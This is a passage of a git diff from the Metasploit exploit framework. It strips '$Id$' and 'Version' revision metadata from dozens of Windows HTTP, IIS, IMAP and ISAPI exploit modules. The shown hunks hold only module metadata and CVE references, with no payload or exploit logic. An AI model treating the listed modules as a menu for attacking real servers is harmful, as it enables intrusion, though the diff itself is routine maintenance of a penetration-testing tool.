Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2003-0727'], diff --git a/modules/exploits/windows/http/osb_uname_jlist.rb b/modules/exploits/windows/http/osb_uname_jlist.rb index 2e77f702e3..713a394f83 100644 --- a/modules/exploits/windows/http/osb_uname_jlist.rb +++ b/modules/exploits/windows/http/osb_uname_jlist.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-10-118' ], diff --git a/modules/exploits/windows/http/peercast_url.rb b/modules/exploits/windows/http/peercast_url.rb index 1ec395da96..901e2c7aa6 100644 --- a/modules/exploits/windows/http/peercast_url.rb +++ b/modules/exploits/windows/http/peercast_url.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2006-1148'], diff --git a/modules/exploits/windows/http/php_apache_request_headers_bof.rb b/modules/exploits/windows/http/php_apache_request_headers_bof.rb index f0c9df5954..bd9b5e8274 100644 --- a/modules/exploits/windows/http/php_apache_request_headers_bof.rb +++ b/modules/exploits/windows/http/php_apache_request_headers_bof.rb @@ -30,7 +30,6 @@ class Metasploit3 < Msf::Exploit::Remote 'juan vazquez', # Metasploit module ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2012-2329'], diff --git a/modules/exploits/windows/http/privatewire_gateway.rb b/modules/exploits/windows/http/privatewire_gateway.rb index d9c7b9c0e2..af3dbe1767 100644 --- a/modules/exploits/windows/http/privatewire_gateway.rb +++ b/modules/exploits/windows/http/privatewire_gateway.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'Michael Thumann ', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2006-3252'], diff --git a/modules/exploits/windows/http/psoproxy91_overflow.rb b/modules/exploits/windows/http/psoproxy91_overflow.rb index 104dfdba0f..c8d4707b0f 100644 --- a/modules/exploits/windows/http/psoproxy91_overflow.rb +++ b/modules/exploits/windows/http/psoproxy91_overflow.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'patrick' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2004-0313' ], diff --git a/modules/exploits/windows/http/sambar6_search_results.rb b/modules/exploits/windows/http/sambar6_search_results.rb index cde5e8bacb..6201d62ae6 100644 --- a/modules/exploits/windows/http/sambar6_search_results.rb +++ b/modules/exploits/windows/http/sambar6_search_results.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -35,7 +31,6 @@ class Metasploit3 < Msf::Exploit::Remote ], 'Arch' => [ ARCH_X86 ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2004-2086' ], diff --git a/modules/exploits/windows/http/sap_mgmt_con_osexec_payload.rb b/modules/exploits/windows/http/sap_mgmt_con_osexec_payload.rb index c8e296adee..a188653fad 100644 --- a/modules/exploits/windows/http/sap_mgmt_con_osexec_payload.rb +++ b/modules/exploits/windows/http/sap_mgmt_con_osexec_payload.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,7 +19,6 @@ class Metasploit4 < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, 'Name' => 'SAP Management Console OSExecute Payload Execution', - 'Version' => '$Revision$', 'License' => MSF_LICENSE, 'Author' => [ 'Chris John Riley' ], 'Description' => %q{ diff --git a/modules/exploits/windows/http/sapdb_webtools.rb b/modules/exploits/windows/http/sapdb_webtools.rb index d2088552d9..7490a3e1b8 100644 --- a/modules/exploits/windows/http/sapdb_webtools.rb +++ b/modules/exploits/windows/http/sapdb_webtools.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-3614' ], diff --git a/modules/exploits/windows/http/savant_31_overflow.rb b/modules/exploits/windows/http/savant_31_overflow.rb index bb00538437..7f7cf7ef55 100644 --- a/modules/exploits/windows/http/savant_31_overflow.rb +++ b/modules/exploits/windows/http/savant_31_overflow.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -34,7 +30,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Author' => [ 'patrick' ], 'Arch' => [ ARCH_X86 ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2002-1120' ], diff --git a/modules/exploits/windows/http/servu_session_cookie.rb b/modules/exploits/windows/http/servu_session_cookie.rb index 2cfecda6b4..68ae6a81f2 100644 --- a/modules/exploits/windows/http/servu_session_cookie.rb +++ b/modules/exploits/windows/http/servu_session_cookie.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -32,7 +28,6 @@ class Metasploit3 < Msf::Exploit::Remote 'jduck' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-4006' ], # unsure diff --git a/modules/exploits/windows/http/shoutcast_format.rb b/modules/exploits/windows/http/shoutcast_format.rb index 9a786485bc..06e4dffed2 100644 --- a/modules/exploits/windows/http/shoutcast_format.rb +++ b/modules/exploits/windows/http/shoutcast_format.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC', 'mandragore[at]gmail.com'], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2004-1373'], diff --git a/modules/exploits/windows/http/shttpd_post.rb b/modules/exploits/windows/http/shttpd_post.rb index 9e792f4387..1ccd31c198 100644 --- a/modules/exploits/windows/http/shttpd_post.rb +++ b/modules/exploits/windows/http/shttpd_post.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'LMH ', 'hdm', 'skOd'], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-5216'], diff --git a/modules/exploits/windows/http/steamcast_useragent.rb b/modules/exploits/windows/http/steamcast_useragent.rb index 96727a0070..961b372779 100644 --- a/modules/exploits/windows/http/steamcast_useragent.rb +++ b/modules/exploits/windows/http/steamcast_useragent.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -30,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote 'patrick' # Added references and check code. Default target to XP. ], 'License' => BSD_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-0550' ], diff --git a/modules/exploits/windows/http/sybase_easerver.rb b/modules/exploits/windows/http/sybase_easerver.rb index cb290a7add..69e353607a 100644 --- a/modules/exploits/windows/http/sybase_easerver.rb +++ b/modules/exploits/windows/http/sybase_easerver.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'Unknown' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2005-2297' ], @@ -79,7 +74,6 @@ class Metasploit3 < Msf::Exploit::Remote 'method' => 'GET', 'headers' => { 'Accept' => '*/*', - 'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)', } }, 5) diff --git a/modules/exploits/windows/http/trackercam_phparg_overflow.rb b/modules/exploits/windows/http/trackercam_phparg_overflow.rb index f97d42c292..67d66ff07c 100644 --- a/modules/exploits/windows/http/trackercam_phparg_overflow.rb +++ b/modules/exploits/windows/http/trackercam_phparg_overflow.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -30,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2005-0478'], diff --git a/modules/exploits/windows/http/trendmicro_officescan.rb b/modules/exploits/windows/http/trendmicro_officescan.rb index 5edbed09d1..65ad88b17e 100644 --- a/modules/exploits/windows/http/trendmicro_officescan.rb +++ b/modules/exploits/windows/http/trendmicro_officescan.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'toto' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-1365' ], diff --git a/modules/exploits/windows/http/webster_http.rb b/modules/exploits/windows/http/webster_http.rb index 74c990400e..f7cb064f2b 100644 --- a/modules/exploits/windows/http/webster_http.rb +++ b/modules/exploits/windows/http/webster_http.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote Simple HTTP-based Server Using MFC and Windows Sockets". }, 'Author' => [ 'patrick' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2002-2268' ], diff --git a/modules/exploits/windows/http/xampp_webdav_upload_php.rb b/modules/exploits/windows/http/xampp_webdav_upload_php.rb index 5447d05138..5c92488218 100644 --- a/modules/exploits/windows/http/xampp_webdav_upload_php.rb +++ b/modules/exploits/windows/http/xampp_webdav_upload_php.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote execute it. }, 'Author' => ['theLightCosine'], - 'Version' => '$Revision$', 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => diff --git a/modules/exploits/windows/http/xitami_if_mod_since.rb b/modules/exploits/windows/http/xitami_if_mod_since.rb index e21bfa14c8..b44e0534c2 100644 --- a/modules/exploits/windows/http/xitami_if_mod_since.rb +++ b/modules/exploits/windows/http/xitami_if_mod_since.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -30,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'patrick', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-5067' ], diff --git a/modules/exploits/windows/http/zenworks_uploadservlet.rb b/modules/exploits/windows/http/zenworks_uploadservlet.rb index 60088dbad1..e59e00093f 100644 --- a/modules/exploits/windows/http/zenworks_uploadservlet.rb +++ b/modules/exploits/windows/http/zenworks_uploadservlet.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '63412' ], diff --git a/modules/exploits/windows/iis/iis_webdav_upload_asp.rb b/modules/exploits/windows/iis/iis_webdav_upload_asp.rb index 187f81b3a0..eddda7b76b 100644 --- a/modules/exploits/windows/iis/iis_webdav_upload_asp.rb +++ b/modules/exploits/windows/iis/iis_webdav_upload_asp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote script using a WebDAV PUT request. }, 'Author' => 'hdm', - 'Version' => '$Revision$', 'Platform' => 'win', 'References' => [ diff --git a/modules/exploits/windows/iis/ms01_023_printer.rb b/modules/exploits/windows/iis/ms01_023_printer.rb index aa9ed21146..4492bfc7da 100644 --- a/modules/exploits/windows/iis/ms01_023_printer.rb +++ b/modules/exploits/windows/iis/ms01_023_printer.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2001-0241'], diff --git a/modules/exploits/windows/iis/ms01_026_dbldecode.rb b/modules/exploits/windows/iis/ms01_026_dbldecode.rb index 6ddbbd0ed6..61d34f5695 100644 --- a/modules/exploits/windows/iis/ms01_026_dbldecode.rb +++ b/modules/exploits/windows/iis/ms01_026_dbldecode.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -31,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'jduck' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2001-0333' ], diff --git a/modules/exploits/windows/iis/ms01_033_idq.rb b/modules/exploits/windows/iis/ms01_033_idq.rb index 3c29334c65..40eab87f70 100644 --- a/modules/exploits/windows/iis/ms01_033_idq.rb +++ b/modules/exploits/windows/iis/ms01_033_idq.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2001-0500'], diff --git a/modules/exploits/windows/iis/ms02_018_htr.rb b/modules/exploits/windows/iis/ms02_018_htr.rb index 19800516e3..38068e8e00 100644 --- a/modules/exploits/windows/iis/ms02_018_htr.rb +++ b/modules/exploits/windows/iis/ms02_018_htr.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -33,7 +29,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'stinko' ], 'License' => BSD_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '1999-0874'], diff --git a/modules/exploits/windows/iis/ms02_065_msadc.rb b/modules/exploits/windows/iis/ms02_065_msadc.rb index ce315ae0a8..5be76c72cb 100644 --- a/modules/exploits/windows/iis/ms02_065_msadc.rb +++ b/modules/exploits/windows/iis/ms02_065_msadc.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote Access Components (MDAC) 2.1 through 2.6 are known to be vulnerable. }, 'Author' => 'patrick', - 'Version' => '$Revision$', 'Platform' => 'win', 'References' => [ diff --git a/modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb b/modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb index d9513c33be..11afa8a7f6 100644 --- a/modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb +++ b/modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2003-0109'], diff --git a/modules/exploits/windows/imap/eudora_list.rb b/modules/exploits/windows/imap/eudora_list.rb index 56bfec8eb0..5c5d6ba4ee 100644 --- a/modules/exploits/windows/imap/eudora_list.rb +++ b/modules/exploits/windows/imap/eudora_list.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -32,7 +28,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC', 'jduck' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2005-4267'], diff --git a/modules/exploits/windows/imap/imail_delete.rb b/modules/exploits/windows/imap/imail_delete.rb index def8657029..c431076529 100644 --- a/modules/exploits/windows/imap/imail_delete.rb +++ b/modules/exploits/windows/imap/imail_delete.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'spoonm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2004-1520'], diff --git a/modules/exploits/windows/imap/ipswitch_search.rb b/modules/exploits/windows/imap/ipswitch_search.rb index 8f1be3158c..553a449dcf 100644 --- a/modules/exploits/windows/imap/ipswitch_search.rb +++ b/modules/exploits/windows/imap/ipswitch_search.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-3925' ], diff --git a/modules/exploits/windows/imap/mailenable_login.rb b/modules/exploits/windows/imap/mailenable_login.rb index 1e60b5556b..983b8abafb 100644 --- a/modules/exploits/windows/imap/mailenable_login.rb +++ b/modules/exploits/windows/imap/mailenable_login.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-6423'], diff --git a/modules/exploits/windows/imap/mailenable_status.rb b/modules/exploits/windows/imap/mailenable_status.rb index 54f589527d..1b62b7ceea 100644 --- a/modules/exploits/windows/imap/mailenable_status.rb +++ b/modules/exploits/windows/imap/mailenable_status.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2005-2278'], diff --git a/modules/exploits/windows/imap/mailenable_w3c_select.rb b/modules/exploits/windows/imap/mailenable_w3c_select.rb index aebf66dd3e..f601bb7911 100644 --- a/modules/exploits/windows/imap/mailenable_w3c_select.rb +++ b/modules/exploits/windows/imap/mailenable_w3c_select.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -30,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2005-3155'], diff --git a/modules/exploits/windows/imap/mdaemon_cram_md5.rb b/modules/exploits/windows/imap/mdaemon_cram_md5.rb index 848111f031..8b7996b942 100644 --- a/modules/exploits/windows/imap/mdaemon_cram_md5.rb +++ b/modules/exploits/windows/imap/mdaemon_cram_md5.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'Unknown' ], 'License' => BSD_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2004-1520'], diff --git a/modules/exploits/windows/imap/mdaemon_fetch.rb b/modules/exploits/windows/imap/mdaemon_fetch.rb index 3999c24baf..d556e82327 100644 --- a/modules/exploits/windows/imap/mdaemon_fetch.rb +++ b/modules/exploits/windows/imap/mdaemon_fetch.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'Jacopo Cervini', 'patrick' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-1358' ], diff --git a/modules/exploits/windows/imap/mercur_imap_select_overflow.rb b/modules/exploits/windows/imap/mercur_imap_select_overflow.rb index f6c10b6785..be198f3fe8 100644 --- a/modules/exploits/windows/imap/mercur_imap_select_overflow.rb +++ b/modules/exploits/windows/imap/mercur_imap_select_overflow.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'Jacopo Cervini ' ], 'License' => BSD_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-1255' ], diff --git a/modules/exploits/windows/imap/mercur_login.rb b/modules/exploits/windows/imap/mercur_login.rb index 384ac4ba09..be1cf73956 100644 --- a/modules/exploits/windows/imap/mercur_login.rb +++ b/modules/exploits/windows/imap/mercur_login.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-1255' ], diff --git a/modules/exploits/windows/imap/mercury_login.rb b/modules/exploits/windows/imap/mercury_login.rb index b4cfbb7b15..09818cda0d 100644 --- a/modules/exploits/windows/imap/mercury_login.rb +++ b/modules/exploits/windows/imap/mercury_login.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-1373' ], diff --git a/modules/exploits/windows/imap/mercury_rename.rb b/modules/exploits/windows/imap/mercury_rename.rb index e64b0c26e8..04a7344f06 100644 --- a/modules/exploits/windows/imap/mercury_rename.rb +++ b/modules/exploits/windows/imap/mercury_rename.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2004-1211'], diff --git a/modules/exploits/windows/imap/novell_netmail_append.rb b/modules/exploits/windows/imap/novell_netmail_append.rb index 34619e83b0..cd27b1dace 100644 --- a/modules/exploits/windows/imap/novell_netmail_append.rb +++ b/modules/exploits/windows/imap/novell_netmail_append.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-6425' ], diff --git a/modules/exploits/windows/imap/novell_netmail_auth.rb b/modules/exploits/windows/imap/novell_netmail_auth.rb index c9700585cb..1fe620698a 100644 --- a/modules/exploits/windows/imap/novell_netmail_auth.rb +++ b/modules/exploits/windows/imap/novell_netmail_auth.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '55175' ], diff --git a/modules/exploits/windows/imap/novell_netmail_status.rb b/modules/exploits/windows/imap/novell_netmail_status.rb index 3ef77dd8a2..5ce9115ce9 100644 --- a/modules/exploits/windows/imap/novell_netmail_status.rb +++ b/modules/exploits/windows/imap/novell_netmail_status.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2005-3314' ], diff --git a/modules/exploits/windows/imap/novell_netmail_subscribe.rb b/modules/exploits/windows/imap/novell_netmail_subscribe.rb index b43097a777..47ad522926 100644 --- a/modules/exploits/windows/imap/novell_netmail_subscribe.rb +++ b/modules/exploits/windows/imap/novell_netmail_subscribe.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-6761' ], diff --git a/modules/exploits/windows/isapi/ms00_094_pbserver.rb b/modules/exploits/windows/isapi/ms00_094_pbserver.rb index ca18973f0f..96ff3ecb81 100644 --- a/modules/exploits/windows/isapi/ms00_094_pbserver.rb +++ b/modules/exploits/windows/isapi/ms00_094_pbserver.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'patrick' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2000-1089' ], diff --git a/modules/exploits/windows/isapi/ms03_022_nsiislog_post.rb b/modules/exploits/windows/isapi/ms03_022_nsiislog_post.rb index 92c9d5ae71..5d32493e88 100644 --- a/modules/exploits/windows/isapi/ms03_022_nsiislog_post.rb +++ b/modules/exploits/windows/isapi/ms03_022_nsiislog_post.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2003-0349'], diff --git a/modules/exploits/windows/isapi/ms03_051_fp30reg_chunked.rb b/modules/exploits/windows/isapi/ms03_051_fp30reg_chunked.rb index ca5738ea14..05c738419f 100644 --- a/modules/exploits/windows/isapi/ms03_051_fp30reg_chunked.rb +++ b/modules/exploits/windows/isapi/ms03_051_fp30reg_chunked.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2003-0822'], diff --git a/modules/exploits/windows/isapi/rsa_webagent_redirect.rb b/modules/exploits/windows/isapi/rsa_webagent_redirect.rb index a8f7bcb6a4..7dc3d2682a 100644 --- a/modules/exploits/windows/isapi/rsa_webagent_redirect.rb +++ b/modules/exploits/windows/isapi/rsa_webagent_redirect.rb 